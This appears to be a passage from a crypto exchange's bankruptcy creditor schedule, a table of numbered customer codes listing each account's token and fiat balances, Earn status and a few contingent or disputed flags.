| 07353466 | | BRZ[1], CUSDT[8], DOGE[175.88026653], TRX[1], USD[0.00] | | |
| 07353467 | | DOGE[0], ETH[0], GRT[0], USD[0.01], USDT[1.09693513] | Yes | |
| 07353470 | | USD[0.00] | | |
| 07353471 | | CUSDT[2], DOGE[1], SHIB[2116178.50021428], TRX[2], USD[0.01], USDT[1.09755645] | Yes | |
| 07353472 | | USD[10.00] | | |
| 07353475 | | BRZ[1], CUSDT[6], SHIB[580384.05281485], USD[1.89] | | |
| 07353476 | | TRX[67.66856747], USD[0.00] | | |
| 07353478 | | BTC[0], DOGE[0], ETH[0], ETHW[0], USD[0.00] | | |
| 07353479 | | BRZ[1], CUSDT[3], GRT[1], TRX[4], USD[0.00] | | |
| 07353480 | | USD[11.06] | Yes | |
| 07353481 | | BTC[0.00039670], DOGE[1.00049931], USD[0.00] | | |
| 07353482 | | USD[10.00] | | |
| 07353483 | | USD[10.00] | | |
| 07353484 | | DOGE[206.23955508], TRX[1], USD[10.55] | | |
| 07353485 | | BRZ[2], CUSDT[3], DOGE[2], TRX[7], USD[0.00] | | |
| 07353486 | | USD[10.00] | | |
| 07353488 | | USD[10.00] | | |
| 07353490 | | BAT[1.0165555], BRZ[1], CUSDT[2], DOGE[1], USD[0.39] | Yes | |
| 07353491 | | BAT[5], BRZ[2], CUSDT[7], GRT[2], TRX[6], USD[2.08], USDT[1] | | |
| 07353492 | | USD[10.00] | | |
| 07353493 | | CUSDT[1], DOGE[2.05078736], ETH[.00000001], SOL[.00002551], TRX[1], USD[0.00] | Yes | |
| 07353494 | | USD[10.00] | | |
| 07353495 | | BRZ[0], DOGE[0], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07353497 | | USD[10.00] | | |
| 07353498 | | USD[10.98] | Yes | |
| 07353500 | | BRZ[1], CUSDT[6], DOGE[290.23668908], SHIB[4401862.82572169], USD[110.63] | Yes | |
| 07353501 | | USD[10.00] | | |
| 07353502 | | DOGE[29.59897764], USD[0.00] | | |
| 07353503 | | USD[10.00] | | |
| 07353504 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07353505 | | BTC[0.00002025], CUSDT[13], DOGE[0], USD[0.00] | | |
| 07353506 | | CUSDT[1], DOGE[.00002162], USD[0.00] | | |
| 07353507 | | USD[10.00] | | |
| 07353508 | | USD[10.00] | | |
| 07353509 | | BTC[0], GRT[1.00367791], USD[0.00] | Yes | |
| 07353510 | | USD[10.00] | | |
| 07353511 | | BF_POINT[300], CUSDT[7], DOGE[117.74700557], SHIB[5254198.86258707], USD[0.00] | Yes | |
| 07353512 | | USD[10.00] | | |
| 07353513 | | DOGE[3.66306533], ETH[.1243487], ETHW[.12318987], USD[0.00], USDT[0.00000001] | Yes | |
| 07353514 | | USD[10.00] | | |
| 07353515 | | USD[10.00] | | |
| 07353516 | | USD[10.00] | | |
| 07353517 | | LTC[.00004823], USD[0.00] | | |
| 07353518 | Contingent, Disputed | ETH[0.00000008], ETHW[0.00000008], MATIC[.00014893], USD[0.00] | Yes | |
| 07353520 | | USD[10.00] | | |
| 07353522 | | USD[10.00] | | |
| 07353523 | | BAT[1.01655549], BRZ[1], DOGE[3095.70546548], SOL[16.64343027], TRX[1061.65031648], USD[0.01], USDT[0] | Yes | |
| 07353525 | | USD[10.00] | | |
| 07353526 | | BRZ[2], BTC[.00000724], CUSDT[8], DOGE[1.00681578], GRT[.00001482], SHIB[1], SOL[8.54021212], TRX[3.0591431], USD[0.00] | Yes | |
| 07353527 | | USD[10.00] | | |
| 07353528 | | DOGE[1], USD[0.00] | | |
| 07353529 | | USD[0.01] | | |
| 07353530 | | CUSDT[1], DOGE[0], USD[0.01] | | |
| 07353531 | | BRZ[1], BTC[.00086527], CUSDT[10], DOGE[.64691619], TRX[1.00002981], USD[0.06] | Yes | |
| 07353532 | | USD[10.00] | | |
| 07353533 | | BTC[0], LTC[0], SOL[0], USD[35.62] | | |
| 07353535 | | USD[0.00], USDT[0] | | |
| 07353536 | | CUSDT[3], DOGE[.00068401], GRT[2.1101479], USD[0.00] | | |
| 07353537 | | USD[10.00] | | |
| 07353538 | | USD[0.00] | | |
| 07353539 | | USD[10.00] | | |
| 07353540 | | USD[10.00] | | |
| 07353542 | | USD[10.00] | | |
| 07353545 | | USD[10.00] | | |
| 07353546 | | USD[10.00] | | |
| 07353547 | | CUSDT[1], GRT[1], TRX[1], USD[0.00] | Yes | |
| 07353548 | | USD[10.00] | | |
| 07353549 | | USD[10.00] | | |
| 07353551 | | USD[10.00] | | |
| 07353552 | | CUSDT[2], TRX[2], USD[0.00] | | |
| 07353553 | | BCH[.000726], CUSDT[1], DOGE[60.78187932], USD[3.25] | | |
| 07353555 | | BTC[.0015012], CUSDT[1], DOGE[2547.77982812], SHIB[45535673.85958701], TRX[9510.89017536], USD[0.00], USDT[0] | Yes | |
| 07353556 | | USD[10.00] | | |
| 07353557 | | USD[10.00] | | |
| 07353560 | | CUSDT[1], TRX[1554.66204042], USD[10.00] | | |
| 07353561 | | BRZ[1], CUSDT[8], SHIB[3359050.38504651], SOL[.26626154], TRX[1], USD[130.98] | Yes | |
| 07353562 | | USD[10.00] | | |
| 07353563 | | BAT[2], BRZ[1], CUSDT[1], DOGE[5471.29508728], SUSHI[1], TRX[1], USD[0.04] | | |
| 07353564 | | USD[10.00] | | |
| 07353565 | | USD[10.00] | | |
| 07353566 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07353568 | | CUSDT[2], DOGE[1], TRX[1], USD[0.97] | | |
| 07353569 | | CUSDT[2], USD[0.53] | | |
| 07353570 | | BAT[21.73753498], CUSDT[1], USD[6.81] | | |
| 07353571 | | CUSDT[4], DOGE[151.05841079], USD[0.00] | | |
| 07353572 | | CUSDT[10], USD[0.01] | Yes | |
| 07353573 | | USD[10.00] | | |
| 07353575 | | USD[10.00] | | |
| 07353576 | | BTC[0], CUSDT[1], DOGE[.00003816], USD[0.00] | | |
| 07353577 | | USD[10.00] | | |
| 07353578 | | USD[10.00] | | |
| 07353579 | | BAT[1], CUSDT[2], DOGE[4829.73816849], TRX[1], USD[0.00] | | |
| 07353580 | | DOGE[102.55275689], USD[2.50] | | |
| 07353581 | | USD[10.00] | | |
| 07353582 | | BRZ[1], DOGE[2939.18582191], GRT[396.52789151], TRX[2], USD[0.00] | Yes | |
| 07353583 | | USD[10.00] | | |
| 07353584 | | CUSDT[2], DOGE[2], MATIC[64.19748715], USD[0.00] | Yes | |
| 07353585 | | USD[10.00] | | |
| 07353586 | | USD[10.00] | | |
| 07353587 | | USD[10.00] | | |
| 07353589 | | USD[10.00] | | |
| 07353590 | | USD[10.00] | | |
| 07353591 | | USD[0.00] | | |
| 07353593 | | USD[10.00] | | |
| 07353594 | | DOGE[22.62254115], USD[0.00] | | |
| 07353595 | | USD[10.00] | | |
| 07353596 | | USD[0.01] | | |
| 07353597 | | USD[10.00] | | |
| 07353598 | | BAT[6.72567154], BRZ[58.20733165], CAD[13.72], DOGE[143.83840342], ETH[.01184201], ETHW[.01184201], SGD[6.50], TRX[1523.26034529], USD[0.00] | | |
| 07353599 | | USD[10.00] | | |
| 07353600 | | USD[10.00] | | |
| 07353602 | | CUSDT[1], DOGE[15.09561069], USD[0.00] | | |
| 07353603 | | GRT[0], USD[0.00] | | |
| 07353604 | | USD[10.00] | | |
| 07353605 | | USD[10.00] | | |
| 07353606 | | USD[10.00] | | |
| 07353607 | | CUSDT[1], DOGE[1145.50080247], TRX[209.29710288], USD[0.00] | | |
| 07353608 | | USD[10.00] | | |
| 07353609 | | CUSDT[5], TRX[2], USD[0.01] | | |
| 07353610 | | DOGE[26.3190069], USD[0.00] | Yes | |
| 07353612 | | BAT[3], BRZ[4], CUSDT[15], GRT[2], TRX[2099.6354584], UNI[18.93059189], USD[0.00], USDT[0] | | |
| 07353613 | | BRZ[1], DOGE[4137.7792701], USD[0.00] | | |
| 07353614 | | BCH[.00001452], BRZ[1], CUSDT[1], DOGE[1.19389261], GRT[2], USD[0.00] | | |
| 07353615 | | BRZ[1], CUSDT[1], DOGE[0], SHIB[1], USD[17.72], USDT[0.00000001] | | |
| 07353616 | | USD[19.88] | | |
| 07353617 | | CUSDT[1], DOGE[1.00000637], TRX[.00055298], USD[0.00] | | |
| 07353618 | | CUSDT[2], DOGE[3], TRX[1], USD[0.00] | | |
| 07353619 | | USD[0.01] | | |
| 07353620 | | CUSDT[3], DOGE[.05996533], LTC[.01926801], TRX[3], USD[0.00], USDT[0] | | |
| 07353621 | | USD[10.00] | | |
| 07353622 | | USD[10.00] | | |
| 07353623 | | USD[10.00] | | |
| 07353624 | | USD[10.00] | | |
| 07353625 | | USD[10.00] | | |
| 07353627 | | BAT[1], BTC[.00000025], CUSDT[2], DOGE[2.00003582], USD[0.01] | | |
| 07353628 | | BAT[1], DOGE[5], ETH[1.18785744], ETHW[1.18785744], GRT[1], LINK[120.47644358], TRX[1], USD[0.00] | | |
| 07353629 | | BRZ[1], CUSDT[3], DOGE[5507.64584708], ETH[.04504622], ETHW[.04504622], LINK[3.7750264], SUSHI[5.82119305], TRX[1], USD[0.71], USDT[1], YFI[.00121571] | | |
| 07353630 | | USD[10.00] | | |
| 07353631 | | DOGE[1], SUSHI[0], USD[0.00], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07353632 | | BAT[1], BRZ[2], DOGE[19684.83538763], GRT[1], TRX[2], USD[0.00], USDT[1] | | |
| 07353633 | | BRZ[2], CUSDT[5], DOGE[1], SHIB[1], TRX[3], USD[203.14] | Yes | |
| 07353634 | | USD[10.00] | | |
| 07353635 | | CUSDT[2], DOGE[282.53726879], USD[0.00] | | |
| 07353636 | | USD[10.00] | | |
| 07353637 | | USD[10.00] | | |
| 07353638 | | DOGE[162.27180513], USD[0.00] | Yes | |
| 07353639 | | USD[10.00] | | |
| 07353640 | | USD[10.00] | | |
| 07353641 | | USD[10.00] | | |
| 07353642 | | BTC[.0002221], CUSDT[1], USD[0.00] | | |
| 07353643 | | BTC[0], CUSDT[6], DOGE[1.00797292], SOL[.000862], TRX[3], USD[0.01] | | |
| 07353644 | | CUSDT[7], TRX[2], USD[0.01] | | |
| 07353645 | | USD[10.00] | | |
| 07353646 | | USD[10.00] | | |
| 07353647 | | BAT[2.0165555], BRZ[9.94044934], CUSDT[16], DOGE[.51127893], ETH[.00004995], ETHW[.00004995], GRT[4.24331283], LTC[.01285081], SHIB[12249414.40215227], TRX[5.34500275], USD[14.86], USDT[5.52247192] | Yes | |
| 07353648 | | USD[0.00] | | |
| 07353649 | | BRZ[3], CUSDT[9], TRX[2], USD[0.00] | | |
| 07353650 | | CUSDT[7], USD[0.00] | Yes | |
| 07353651 | | USD[10.00] | | |
| 07353652 | | USD[10.00] | | |
| 07353653 | | BRZ[1], CUSDT[4], DOGE[.63646242], TRX[2], USD[0.01] | | |
| 07353654 | | DOGE[16.46722583], USD[0.00] | | |
| 07353655 | | USD[10.00] | | |
| 07353656 | | USD[10.00] | | |
| 07353657 | | TRX[1], USD[100.03] | | |
| 07353658 | | BTC[.00020258], DOGE[4850.90830391], USD[0.00] | Yes | |
| 07353660 | | USD[10.00] | | |
| 07353662 | | USD[10.00] | | |
| 07353663 | | CUSDT[222.64654657], USD[0.00], USDT[0] | | |
| 07353664 | | BRZ[1], BTC[.00211351], CUSDT[1], DOGE[2701.4174721], ETH[.06049072], ETHW[.06049072], GRT[8.86446901], TRX[1], USD[0.00] | | |
| 07353665 | | CUSDT[4], DOGE[1447.39948348], SHIB[741949.84419053], USD[0.07] | | |
| 07353666 | | BTC[.00000001], CUSDT[1], DOGE[74.95801526], SOL[.00000001], TRX[1], USD[0.01] | | |
| 07353667 | | DOGE[307.65011246], USD[10.00] | | |
| 07353668 | | USD[10.00] | | |
| 07353669 | | USD[0.00], USDT[0] | | |
| 07353670 | | BAT[1.01655549], BRZ[1], BTC[0], CUSDT[1], DOGE[1], TRX[2], USD[0.00] | Yes | |
| 07353671 | | DOGE[5.82465861], ETH[.0863178], ETHW[.0863178], SUSHI[1.1540611], USD[0.05] | | |
| 07353672 | | USD[10.00] | | |
| 07353673 | | BTC[.0069777], CUSDT[4], DOGE[0.00000001], TRX[2], USD[0.04] | | |
| 07353674 | | USD[10.00] | | |
| 07353675 | | DOGE[818.89956847], USD[10.00] | | |
| 07353676 | | BAT[.77971558], BRZ[3], CUSDT[15], DOGE[12.96769475], ETH[.00225823], ETHW[.00225823], GRT[.00026541], SOL[.07271994], TRX[13.00001585], USD[0.05], USDT[1] | | |
| 07353677 | | DOGE[736.33910309], SUSHI[.4752296], USD[0.00] | | |
| 07353678 | | USD[10.00] | | |
| 07353679 | | TRX[75.16129614], USD[0.00] | | |
| 07353681 | | CUSDT[467.78285893], USD[0.00] | | |
| 07353682 | | DOGE[42.28860518], USD[0.00] | | |
| 07353683 | | USD[10.00] | | |
| 07353684 | | USD[10.00] | | |
| 07353685 | | CUSDT[1], NFT (503401022905420131/Entrance Voucher #2288)[1], USD[0.00] | Yes | |
| 07353686 | | BAT[1.0109208], BRZ[3], CUSDT[6], GRT[1.00265308], TRX[7], USD[140000.84], USDT[2.08654667] | Yes | |
| 07353687 | | USD[10.00] | | |
| 07353688 | | BTC[0], DOGE[0], TRX[0], USD[0.00], USDT[0] | | |
| 07353689 | | USD[10.00] | | |
| 07353690 | | CUSDT[1], USD[0.00] | | |
| 07353691 | | CUSDT[2], TRX[1], USD[0.01] | | |
| 07353692 | | BRZ[3], CUSDT[3], DOGE[23.76769343], ETH[3.20123475], ETHW[3.19986104], SHIB[2], SOL[28.88567843], TRX[7], USD[0.04] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07353694 | | DOGE[30.21833928], USD[0.00] | | |
| 07353695 | | BAT[0], BRZ[0], USD[0.00] | | |
| 07353696 | | USD[10.00] | | |
| 07353697 | | USD[10.00] | | |
| 07353698 | | USD[0.00], USDT[0] | | |
| 07353699 | | USD[10.00] | | |
| 07353700 | | USD[10.00] | | |
| 07353701 | | USD[10.00] | | |
| 07353702 | | CUSDT[2], DOGE[1173.80097779], TRX[1], USD[0.00] | | |
| 07353703 | | DOGE[1728.841], GRT[0.30087935], USD[0.04] | | |
| 07353704 | | BRZ[1], CUSDT[2], TRX[5], USD[0.01], USDT[1] | | |
| 07353705 | | BRZ[2], CUSDT[79.41950174], DOGE[40280.95125086], SHIB[1], USD[0.01] | Yes | |
| 07353706 | | EUR[0.00], KSHIB[37.07998278], SHIB[70378.90726614], SOL[.00000016], TRX[.00183563], USD[0.00] | Yes | |
| 07353707 | | CUSDT[1], USD[0.00], USDT[0] | Yes | |
| 07353708 | | USD[10.00] | | |
| 07353709 | | SOL[1.71225718], USD[10.00] | | |
| 07353710 | | CUSDT[2], DOGE[887.13023007], TRX[2], USD[4.59] | | |
| 07353711 | | USD[10.00] | | |
| 07353713 | | USD[10.00] | | |
| 07353714 | | USD[10.00] | | |
| 07353715 | | USD[0.00], USDT[10.97021973] | Yes | |
| 07353716 | | BRZ[1], CUSDT[20.51943117], DOGE[1], TRX[1], USD[0.00] | | |
| 07353717 | | USD[10.00] | | |
| 07353718 | | USD[10.00] | | |
| 07353719 | | USD[13.91] | | |
| 07353720 | | DOGE[33.6694555], USD[0.00] | | |
| 07353721 | | TRX[127.69218971], USD[0.00] | Yes | |
| 07353722 | | USD[10.00] | | |
| 07353723 | | USD[10.00] | | |
| 07353724 | | USD[10.00] | | |
| 07353725 | | USD[10.00] | | |
| 07353726 | | USD[10.00] | | |
| 07353727 | | TRX[1.08478804], USD[0.00] | | |
| 07353728 | | BTC[.00021443], DOGE[1], LINK[2.90313144], USD[0.00] | | |
| 07353729 | Contingent, Disputed | ETH[.00000003], ETHW[.00000003], SHIB[2], SOL[.00000099], USD[0.00] | Yes | |
| 07353730 | | CUSDT[1], USD[0.01] | | |
| 07353731 | | USD[0.01] | | |
| 07353733 | | USD[0.00] | | |
| 07353734 | | USD[0.00] | Yes | |
| 07353735 | | BF_POINT[300], DOGE[0], ETH[0], TRX[1], USD[0.00] | Yes | |
| 07353736 | | DOGE[.00002652], TRX[2], USD[0.72] | | |
| 07353737 | | BRZ[1], TRX[1], USD[0.00] | | |
| 07353738 | | USD[10.00] | | |
| 07353739 | | DOGE[1], USD[0.00] | | |
| 07353740 | | BAT[1.00991175], BRZ[2], BTC[.00180819], CUSDT[5.00860586], DOGE[4], NFT (407078729384940259/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #87)[1], TRX[2], USD[626.58], USDT[0] | Yes | |
| 07353741 | | BRZ[1], DOGE[0], ETH[0], UNI[1.10693807], USD[0.05] | Yes | |
| 07353742 | | CUSDT[1], DOGE[148.63600006], USD[0.00] | Yes | |
| 07353744 | | USD[10.00] | | |
| 07353745 | | USD[10.00] | | |
| 07353746 | | BRZ[1], CUSDT[5], TRX[3], USD[0.00] | | |
| 07353747 | | BAT[1], BCH[0], BRZ[6], CUSDT[10], DOGE[1], GRT[.00000217], TRX[12], USD[0.00] | | |
| 07353748 | | BRZ[2], CUSDT[4], GRT[1], TRX[1], USD[0.00] | | |
| 07353749 | | USD[10.00] | | |
| 07353750 | | BRZ[1], BTC[.05401295], CUSDT[39], DOGE[20042.18826026], TRX[1659.96692953], USD[0.01] | | |
| 07353751 | | TRX[1], USD[0.00] | | |
| 07353752 | | USD[0.00], USDT[0] | | |
| 07353753 | | BRZ[1], CUSDT[5], DOGE[0], ETH[0], ETHW[0], SUSHI[0.00007543], TRX[5], UNI[.00000066], USD[0.00] | | |
| 07353754 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07353755 | | USD[10.00] | | |
| 07353756 | | USD[10.00] | | |
| 07353757 | | BRZ[2], CUSDT[3], USD[0.00] | | |
| 07353758 | | USD[10.00] | | |
| 07353762 | | TRX[1], USD[0.01] | | |
| 07353764 | | USD[10.00] | | |
| 07353765 | | BRZ[3], CUSDT[8], DOGE[1], TRX[1], USD[0.00] | | |
| 07353766 | | USD[10.00] | | |
| 07353767 | | DOGE[1.38585331], TRX[1], USD[0.01] | | |
| 07353768 | | CUSDT[1], DOGE[0], USD[0.01] | | |
| 07353769 | | DOGE[1], USD[0.01] | | |
| 07353770 | | USD[10.00] | | |
| 07353772 | | ETH[.00561025], ETHW[.00561025], USD[0.00] | | |
| 07353773 | | DOGE[33.76474776], USD[0.00] | | |
| 07353774 | | USD[10.00] | | |
| 07353775 | | USD[10.00] | | |
| 07353776 | | TRX[1], USD[0.00] | Yes | |
| 07353777 | | SOL[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07353778 | | USD[10.00] | | |
| 07353779 | | DOGE[144.00994244], USD[0.00] | | |
| 07353780 | | USD[10.00] | | |
| 07353781 | | BAT[0], BCH[0], BRZ[1], BTC[0], DAI[0], DOGE[0], ETH[0], EUR[0.00], GRT[1], LINK[0], SHIB[2], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07353782 | | BRZ[2], CUSDT[5], TRX[2], USD[0.01] | Yes | |
| 07353783 | | USD[10.00] | | |
| 07353784 | | DOGE[191.94340414], USD[0.00] | | |
| 07353785 | | USD[0.00] | | |
| 07353787 | | USD[0.00] | | |
| 07353788 | | USD[10.00] | | |
| 07353789 | | CUSDT[3], DOGE[95.50470019], USD[0.01] | | |
| 07353791 | | BCH[0], SOL[0], TRX[0], USD[1.00], USDT[0.00000001] | | |
| 07353792 | | USD[10.00] | | |
| 07353793 | | BTC[0], USD[0.00] | | |
| 07353794 | | USD[10.00] | | |
| 07353795 | | USD[0.00] | | |
| 07353796 | | USD[10.00] | | |
| 07353798 | | BAT[3.25675273], BCH[9.65223776], BRZ[5.07952967], BTC[.00766937], CUSDT[42], DOGE[9371.90874066], LTC[.48521273], SHIB[2], TRX[1], USD[0.00], USDT[1.08152712] | Yes | |
| 07353799 | | CUSDT[1], DOGE[14743.46947476], TRX[1], USD[0.00] | | |
| 07353800 | | ETH[.00603968], ETHW[.00603968], USD[10.00] | | |
| 07353801 | | USD[10.00] | | |
| 07353803 | | BRZ[1], CUSDT[2], USD[0.00] | | |
| 07353804 | | BAT[404.53862026], CUSDT[91.98945823], DOGE[14269.09870196], GRT[75.68934062], MATIC[74.86506218], SHIB[4], SUSHI[7.60012536], TRX[13735.33008608], USD[0.00] | Yes | |
| 07353805 | | BRZ[2], BTC[.00090325], CUSDT[4], DOGE[594.91707339], ETH[.10932183], ETHW[.10822419], LINK[8.80880081], SHIB[1], USD[2.44] | Yes | |
| 07353806 | | USD[10.00] | | |
| 07353807 | | USD[0.00] | Yes | |
| 07353808 | | USD[10.00] | | |
| 07353809 | | USD[10.00] | | |
| 07353810 | | USD[10.00] | | |
| 07353812 | | SHIB[7164079.29985349], USD[0.00] | Yes | |
| 07353813 | | BAT[1], BRZ[2], CUSDT[2], GRT[1], LTC[.15826541], TRX[29892.44267415], USD[0.00], USDT[1] | | |
| 07353814 | | TRX[1], USD[0.00], USDT[9.94606151] | | |
| 07353815 | | USD[10.00] | | |
| 07353816 | | CUSDT[11], DOGE[3429.22962996], TRX[2], USD[678.00] | | |
| 07353817 | | USD[0.00] | Yes | |
| 07353819 | | BRZ[2], BTC[.04062864], CUSDT[5], DOGE[531.85208167], ETH[.6201502], ETHW[.61988984], GRT[47.09563066], SOL[7.54660363], SUSHI[86.33087489], TRX[6], USD[0.00], USDT[2.20953348] | Yes | |
| 07353820 | | USD[10.00] | | |
| 07353821 | | USD[10.00] | | |
| 07353822 | | CUSDT[1], USD[1.00] | | |
| 07353823 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07353824 | | USD[10.00] | | |
| 07353825 | | DOGE[2], USD[0.00], USDT[.00007343] | | |
| 07353826 | | USD[10.00] | | |
| 07353827 | | USD[10.00] | | |
| 07353828 | | USD[0.00] | Yes | |
| 07353829 | | USD[10.00] | | |
| 07353830 | | BRZ[9.19395182], CUSDT[3], DOGE[1584.97423237], TRX[1107.90825979], USD[0.00] | Yes | |
| 07353831 | | BAT[0], BCH[0], DOGE[493.61564827], ETH[0], SOL[0], TRX[0], USD[0.00] | | |
| 07353833 | | USD[0.05] | | |
| 07353834 | | DOGE[44150.85215466], TRX[1], USD[10.00] | | |
| 07353836 | | CUSDT[1], DOGE[1], ETH[.00007999], ETHW[.00007999], USD[0.00] | Yes | |
| 07353837 | | USD[10.00] | | |
| 07353838 | | USD[0.00] | | |
| 07353839 | | DOGE[.00000275], USD[0.01] | | |
| 07353840 | | BAT[0.00003972], CUSDT[3], DOGE[399.99997573], SHIB[252078.21578131], TRX[299.38049194], USD[0.00] | | |
| 07353841 | | USD[10.00] | | |
| 07353842 | | USD[10.00] | | |
| 07353843 | | BAT[3], BRZ[1], BTC[0.00026612], ETH[.00060089], ETHW[.00060089], GRT[1], TRX[3], USD[0.00], USDT[0] | | |
| 07353845 | | LTC[.04785066], USD[0.00] | Yes | |
| 07353846 | | USD[10.00] | | |
| 07353847 | | GRT[1.52395311], USD[0.00], USDT[0] | Yes | |
| 07353848 | | USD[10.00] | | |
| 07353849 | | BAT[1], BCH[0], BRZ[9], BTC[0], CUSDT[16], DOGE[179.71951956], ETH[.00003443], ETHW[.00003443], SOL[.00002], TRX[10.00076997], USD[0.06], USDT[0] | | |
| 07353850 | | USD[10.00] | | |
| 07353851 | | USD[10.00] | | |
| 07353852 | | USD[10.00] | | |
| 07353857 | | BTC[.00021014], USD[0.17] | Yes | |
| 07353858 | | BAT[1], CUSDT[2], USD[0.01] | | |
| 07353859 | | USD[10.00] | | |
| 07353860 | | BAT[1], CUSDT[4], DOGE[0], GRT[.87546094], SUSHI[1], TRX[3], UNI[0], USD[0.46], USDT[0] | | |
| 07353861 | | CUSDT[1], DOGE[4.000548], SHIB[1], TRX[2], USD[0.01], USDT[0] | Yes | |
| 07353862 | | BTC[.00097607], CUSDT[1], SHIB[3117693.90724863], TRX[1], USD[0.00] | | |
| 07353863 | | BRZ[1], CUSDT[2], DOGE[2], TRX[2], USD[7261.67] | | |
| 07353865 | | CUSDT[1], TRX[3], USD[0.00], USDT[0] | | |
| 07353866 | | USD[10.00] | | |
| 07353867 | | BTC[0.01486777], DOGE[0], SHIB[1612071.87537016], TRX[2.39520379], USD[0.00] | Yes | |
| 07353868 | | USD[10.00] | | |
| 07353869 | | USD[10.00] | | |
| 07353871 | | USD[11.10] | Yes | |
| 07353872 | | DOGE[592.26695981], SUSHI[0], USD[0.00] | Yes | |
| 07353873 | | DOGE[276.28537627], USD[20.00] | | |
| 07353874 | | USD[10.00] | | |
| 07353875 | | USD[10.00] | | |
| 07353876 | | USD[10.00] | | |
| 07353877 | | USD[10.00] | | |
| 07353878 | | CUSDT[4], DOGE[629.22986954], KSHIB[643.42586698], TRX[2], USD[0.00] | | |
| 07353879 | | USD[10.00] | | |
| 07353880 | | ETHW[4.12797], TRX[66], USD[1.41] | | |
| 07353881 | | DOGE[1], USD[10.00] | | |
| 07353882 | | BAT[0], BTC[0], DOGE[1], ETH[0], GRT[0], LTC[0], NFT [53115352780082067/Bahrain Ticket Stub #2169][1], SUSHI[0], TRX[1], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07353883 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07353884 | | USD[10.00] | | |
| 07353885 | | USD[10.00] | | |
| 07353886 | | USD[10.00] | | |
| 07353887 | | USD[10.00] | | |
| 07353888 | | CUSDT[464.30186989], TRX[1], USD[0.00], USDT[0] | | |
| 07353889 | | DOGE[177.25942395], USD[0.00] | | |
| 07353890 | | LTC[.05602186], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07353891 | | CUSDT[1], DOGE[2], TRX[5], USD[0.01], USDT[4] | | |
| 07353892 | | USD[10.00] | | |
| 07353893 | | BRZ[1], BTC[.02396277], CUSDT[1], GRT[1], USD[0.00] | Yes | |
| 07353894 | | USD[10.00] | | |
| 07353895 | | USD[10.00] | | |
| 07353896 | | USD[10.00] | | |
| 07353898 | | CUSDT[1], USD[0.00] | | |
| 07353900 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07353901 | | USD[10.00] | | |
| 07353902 | | BTC[.0030722], USD[10.00] | | |
| 07353903 | | DOGE[.00015886], TRX[.00000408], USD[0.00] | | |
| 07353904 | | CUSDT[6], DOGE[1388.63698145], TRX[2], USD[0.01] | | |
| 07353905 | | BAT[1], BRZ[3], CUSDT[10], GRT[2], TRX[1], USD[0.00] | | |
| 07353906 | | CUSDT[5], DOGE[2.804186], LTC[.46672363], SHIB[1], TRX[2], USD[0.00] | | |
| 07353907 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07353908 | | CUSDT[1.42998862], DOGE[47.55971433], TRX[3.22538675], USD[8.37], USDT[6.95946104] | | |
| 07353909 | | TRX[0], USD[0.01] | Yes | |
| 07353910 | | USD[10.00] | | |
| 07353911 | | USD[10.00] | | |
| 07353912 | | AUD[1.28], BTC[.00108844], CUSDT[2], DOGE[652.93067635], ETH[.00684433], ETHW[.00684433], LTC[.08357975], SHIB[1419751.28722973], USD[0.00] | | |
| 07353913 | | USD[10.00] | | |
| 07353914 | | USD[10.00] | | |
| 07353915 | | SHIB[2], USD[0.01] | | |
| 07353916 | Contingent, Disputed | BTC[.01961057], DOGE[49.63036391], ETH[.31060172], GRT[57.14007989], LINK[14.39280139], NFT [3269192786848207604/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #18][1], USD[3.96] | Yes | |
| 07353917 | | USD[10.00] | | |
| 07353920 | | USD[10.00] | | |
| 07353921 | | USD[10.00] | | |
| 07353922 | | USD[10.00] | | |
| 07353923 | | BAT[2], BRZ[1], CUSDT[5], TRX[3], USD[3517.87], USDT[1] | | |
| 07353924 | | DOGE[.32384431], TRX[2], USD[1.69] | | |
| 07353925 | | USD[10.00] | | |
| 07353927 | | USD[10.00] | | |
| 07353928 | | USD[10.00] | | |
| 07353929 | | BRZ[1], DOGE[6955.90053624], SOL[1], TRX[3], USD[9982.58], USDT[1] | | |
| 07353930 | | USD[0.00], USDT[0] | | |
| 07353931 | | CUSDT[5], DOGE[656.85501472], LINK[10.98790871], TRX[1], USD[1.35] | | |
| 07353932 | | USD[10.00] | | |
| 07353933 | | USD[10.00] | | |
| 07353934 | | BRZ[1], DOGE[.00002834], GRT[1], TRX[1], USD[0.00] | | |
| 07353935 | | TRX[1], USD[0.01] | | |
| 07353936 | | USD[10.00] | | |
| 07353937 | | CUSDT[1], DOGE[2], USD[0.82] | | |
| 07353938 | | BRZ[2], BTC[0], CUSDT[5], DOGE[1], TRX[2], USD[0.00] | | |
| 07353939 | | BRZ[0], USD[0.80] | | |
| 07353941 | | USD[10.00] | | |
| 07353942 | | USD[100.00] | | |
